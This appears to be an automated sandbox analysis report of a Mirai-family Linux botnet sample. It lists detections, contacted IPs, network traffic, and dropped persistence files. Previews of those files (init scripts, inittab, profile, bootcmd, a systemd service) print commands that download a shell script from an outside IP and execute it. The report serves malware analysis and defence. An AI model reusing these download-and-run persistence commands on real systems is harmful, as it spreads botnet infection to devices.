Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
m68k.nn.elf	34%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi	m68k.nn.elf	false	high
http://193.143.1.70/curl.sh	m68k.nn.elf	false	high
http://193.143.1.70/lol.sh	m68k.nn.elf	false	high
http://193.143.1.70/	m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.38.dr, custom.service.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.216.19.139	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.216.19.139	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	kj5f8keqNK.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	sshd.elf	Get hash	malicious	Unknown	Browse
	dlr.m68k.elf	Get hash	malicious	Unknown	Browse
	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	ns3.jpg.elf	Get hash	malicious	Muhstik, Tsunami	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	dwhdbg.elf	Get hash	malicious	Unknown	Browse
	splarm6.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	sshd.elf	Get hash	malicious	Unknown	Browse
	dlr.m68k.elf	Get hash	malicious	Unknown	Browse
	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	ns3.jpg.elf	Get hash	malicious	Muhstik, Tsunami	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	dwhdbg.elf	Get hash	malicious	Unknown	Browse
	splarm6.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	dlr.m68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	opt_observer.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	ns3.jpg.elf	Get hash	malicious	Muhstik, Tsunami	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	dwhdbg.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.20.149
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.20.149
	vsbeps.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	dlr.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.18.209
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.18.209
	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.18.209
	iwir64.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	HTMLPhisher	Browse	154.216.17.193
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	154.216.17.193
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	154.216.17.193
INIT7CH	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	dlr.m68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	dlr.arm6.elf	Get hash	malicious	Mirai, Okiru	Browse	109.202.202.202
	dlr.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	109.202.202.202
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	ns3.jpg.elf	Get hash	malicious	Muhstik, Tsunami	Browse	109.202.202.202
	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	dwhdbg.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	splarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/m68k.nn.elf	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/system	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.648756146188875
Encrypted:	false
SSDEEP:	3:KPJRXSC/ANFDDoC6WgrbkILbaaFOdFXa5O:WJRlufonWgrZbaaeXCO
MD5:	D92F5E8E17BDB4502DE149B09746D400
SHA1:	D56B28286B13518769A4B27555F875EE4B36DB56
SHA-256:	5C90BE50A0DDA68C384B3B56B21DB30C1F0CCF9E00A13D90421EA0E436A7E61F
SHA-512:	5F1ED84FB5089CD017B0907A55C97F12951EE500E8C8A1A357027701C2EC4EE26430DF4A623068D7D04BD6802C12F8E4F58281736C38986398DBA8325BE4884B
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/m68k.nn.elf && wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/m68k.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.586399031280707
Encrypted:	false
SSDEEP:	12:QRkiMEXNxl8RUJgjvMHK2FSuKN+dRRucSOyd3:vRWISzhYOM3
MD5:	14CB06C643C4DCA73B64B23284CF2763
SHA1:	96993D1DCEA6A6F005F554569CD1C8AAFB08FBBB
SHA-256:	3AADC3766DB7E7F284DE0497F08BD2B1772B123C537BA087DD7DA7C37919E023
SHA-512:	63ABD56C1C266B0EB8D98C3FD47FB88FD09A37DFDD67C4A59EC679C43BAF987D961D3B60FF338F0D069B89DC2600628AC0814D7890F891B62487AB6CD0072E89
Malicious:	true
Joe Sandbox View:	Filename: m68k.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/m68k.nn.elf..case "" in. start). echo 'Starting m68k.nn.elf'. /tmp/m68k.nn.elf &. wget http://193.143.1.70/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping m68k.nn.elf'. killall m68k.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	105
Entropy (8bit):	4.649400035181374
Encrypted:	false
SSDEEP:	3:TKH4vZKSC/ANFDvSDRFXWgrbkILpaKB0dFLoKE0:h8luzSXXWgrZzBeLXE0
MD5:	E6A67B96787FC1B6EDA521646D9920CD
SHA1:	E59A352E76F3C709F37C670AE2E4EEAF337CB5A9
SHA-256:	5D4E84611ADE58BDFABC1E3D137026054CB5744D1BD224BFBAF1B10E46E8404C
SHA-512:	D388E666B0D683949626DBBA7E050F1D8125BE5C57419F6F53DECA19CB1B64DCB94E3097C96C430B28E9FEB71F3C5D4264264C667EC2961479F2B3C4C116447A
Malicious:	true
Joe Sandbox View:	Filename: m68k.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/m68k.nn.elf &.wget http://193.143.1.70/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.601231599772524
Encrypted:	false
SSDEEP:	3:nAWu58C/ANFDDoC6WgrbkILbaaFOdFXa5O:ANufonWgrZbaaeXCO
MD5:	CFCDBD3AA5CBD4171FCD40080EB52E47
SHA1:	406C8A608D611B3F6BBBE624935CFE4A5186347B
SHA-256:	C06E2679C4765D701B03A76E0010DBA34BC6A2A7E30E6402B8BA6FFFCED6C4DB
SHA-512:	80BE4C753C7DCE271CD755AC931582BAC2C4DAA4EC57AC598A9E647743BD514B17F2A239629A2BA89A2BF46F10ED7E88D58212B504ABAAB42340E3D7DC73F43D
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/m68k.nn.elf && wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.488319695814355
Encrypted:	false
SSDEEP:	3:TgSC/ANFDvSDRFXWgrbkILbaaFOdFXa50:TgluzSXXWgrZbaaeXC0
MD5:	F20A89BA494D443C4631AF3C5DCAAE36
SHA1:	9DF4F458CF5AB8D30516106C240EA2776946DDBA
SHA-256:	F5BFC66DC714E549923EDE002A8BB3358537F264A1080B4827742E6582FBACDA
SHA-512:	D83F142FF3C3EB9C8938719364A0F09D15BAFAFD1EDE2D4B0CD92FC093DB8F9A7FC03DFA1643C731D3444A4B5D0E153C6B0521AE7C55A83A01EE6B88621286A8
Malicious:	true
Preview:	/tmp/m68k.nn.elf &.wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.065814119373622
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+xE02+GWRdCWgrL+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdk+GWRXY+GWRuL6
MD5:	BF3F0CC70BF8D3E32BBFBE3CEDC43163
SHA1:	CB741181853423039BE639E8900AFAD415D517CD
SHA-256:	EA1D8F5173116929B42FEAFD9E4B3B101BB39BCDAF3F27FD36F6AE1EF00D1D4C
SHA-512:	7D82E155B2AB39303D56A07479EE85766C0A9A40A93DCA33674E51590DEF92088C84EA39E82E13551719E6FFE40867715AF36B907735A9CDDAEE17A71B26A77D
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/m68k.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://193.143.1.70/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/user/127/dconf/user

Download File

Process:	/usr/libexec/gsd-housekeeping
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

/tmp/qemu-open.ehO1mT (deleted)

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.6168746059562227
Encrypted:	false
SSDEEP:	3:TgSC/ANln:TglOn
MD5:	CF5BFD6A623ECC046218AA0EBA4D8FE7
SHA1:	E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
SHA-256:	C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
SHA-512:	F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
Malicious:	false
Preview:	/tmp/m68k.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.418582326895235
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	m68k.nn.elf
File size:	117'652 bytes
MD5:	61def540fecb4aea358612e354b3466d
SHA1:	e10244da813f13e237f6269ac1ff189a5e589096
SHA256:	3372697715944f3740c624a2caca3d146610d780aa79f69bcbdce8d860af29db
SHA512:	5f92591d8cbfc7b50f1ffe2a70d75c3fb1ed36c58f9a408a00ada049c24ce2baf55ee86f55d37a03a5d88222b4ab4c19f8999468763b4abc29fed5fbeb64076e
SSDEEP:	3072:zfxFQ7NKlf70M8M76k2MfWYSrLayMdvL2cMcVk6wUsc:rxqBxCyMdycM+kZdc
TLSH:	18B35BC6F801CDBEFD1ED67B44270619B620A3711F520B27E25BFDA7AD621D8481BE81
File Content Preview:	.ELF.......................D...4.........4. ...(.................................. .......................($...... .dt.Q............................NV..a....da....TN^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	117252
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0x1927e	0x0	0x6	AX	4
.fini	PROGBITS	0x80019326	0x19326	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x80019334	0x19334	0x30c2	0x0	0x2	A	2
.ctors	PROGBITS	0x8001e3fc	0x1c3fc	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8001e404	0x1c404	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8001e410	0x1c410	0x5b4	0x0	0x3	WA	4
.bss	NOBITS	0x8001e9c4	0x1c9c4	0x225c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x1c9c4	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x1c3f6	0x1c3f6	6.4302	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x1c3fc	0x8001e3fc	0x8001e3fc	0x5c8	0x2824	5.0076	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 11:22:59.479187012 CET	38962	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.599200010 CET	199	38962	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.599272966 CET	38962	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.601722956 CET	38962	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.602953911 CET	38962	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.605973005 CET	38964	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.721764088 CET	199	38962	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.725893974 CET	199	38964	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.725944042 CET	38964	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.727229118 CET	38964	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.727654934 CET	38964	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.734503031 CET	38966	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.765788078 CET	199	38962	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.847100973 CET	199	38964	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.854470015 CET	199	38966	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.854602098 CET	38966	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.889782906 CET	199	38964	154.216.19.139	192.168.2.23
Nov 27, 2024 11:22:59.909719944 CET	38966	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.912336111 CET	38966	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:22:59.955355883 CET	38968	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.030112028 CET	199	38966	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.073887110 CET	199	38966	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.075268984 CET	199	38968	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.075366020 CET	38968	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.088251114 CET	38968	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.090342999 CET	38968	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.097062111 CET	38970	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.208247900 CET	199	38968	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.217605114 CET	199	38970	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.217700958 CET	38970	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.222685099 CET	38970	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.225100040 CET	38970	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.253815889 CET	199	38968	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.276779890 CET	38972	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.342787027 CET	199	38970	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.385838985 CET	199	38970	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.397007942 CET	199	38972	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.397106886 CET	38972	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.401309013 CET	38972	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.404387951 CET	38972	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.429399014 CET	38974	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.521234989 CET	199	38972	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.549398899 CET	199	38974	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.552895069 CET	43928	443	192.168.2.23	91.189.91.42
Nov 27, 2024 11:23:00.552896023 CET	38974	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.558759928 CET	38974	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.559930086 CET	38974	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.565886974 CET	199	38972	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.593214035 CET	38976	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.678678036 CET	199	38974	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.713215113 CET	199	38976	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.713299036 CET	38976	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.725872993 CET	199	38974	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.750304937 CET	38976	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.768922091 CET	38976	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.812155008 CET	38978	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.870275974 CET	199	38976	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.932265043 CET	199	38978	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.933901072 CET	199	38976	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:00.934034109 CET	38978	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.981889963 CET	38978	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:00.983656883 CET	38978	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:01.101989985 CET	199	38978	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:01.149827003 CET	199	38978	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:01.922156096 CET	199	38962	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:01.922291994 CET	38962	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.015925884 CET	199	38964	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.017283916 CET	38964	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.109879017 CET	199	38966	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.109957933 CET	38966	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.302860975 CET	199	38968	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.302947998 CET	38968	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.482779980 CET	199	38970	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.482873917 CET	38970	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.630763054 CET	199	38972	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.630893946 CET	38972	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:02.818811893 CET	199	38974	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:02.818914890 CET	38974	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:03.015095949 CET	199	38976	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:03.015211105 CET	38976	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:03.308423042 CET	199	38978	154.216.19.139	192.168.2.23
Nov 27, 2024 11:23:03.308552027 CET	38978	199	192.168.2.23	154.216.19.139
Nov 27, 2024 11:23:05.928253889 CET	42836	443	192.168.2.23	91.189.91.43
Nov 27, 2024 11:23:06.952073097 CET	42516	80	192.168.2.23	109.202.202.202
Nov 27, 2024 11:23:21.030200005 CET	43928	443	192.168.2.23	91.189.91.42
Nov 27, 2024 11:23:33.316384077 CET	42836	443	192.168.2.23	91.189.91.43
Nov 27, 2024 11:23:37.411813974 CET	42516	80	192.168.2.23	109.202.202.202
Nov 27, 2024 11:24:01.984507084 CET	43928	443	192.168.2.23	91.189.91.42

System Behavior

Analysis Process: m68k.nn.elf PID: 6238, Parent PID: 6158

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	/tmp/m68k.nn.elf
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6255, Parent PID: 6238

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6269, Parent PID: 6238

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6269, Parent PID: 6238

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

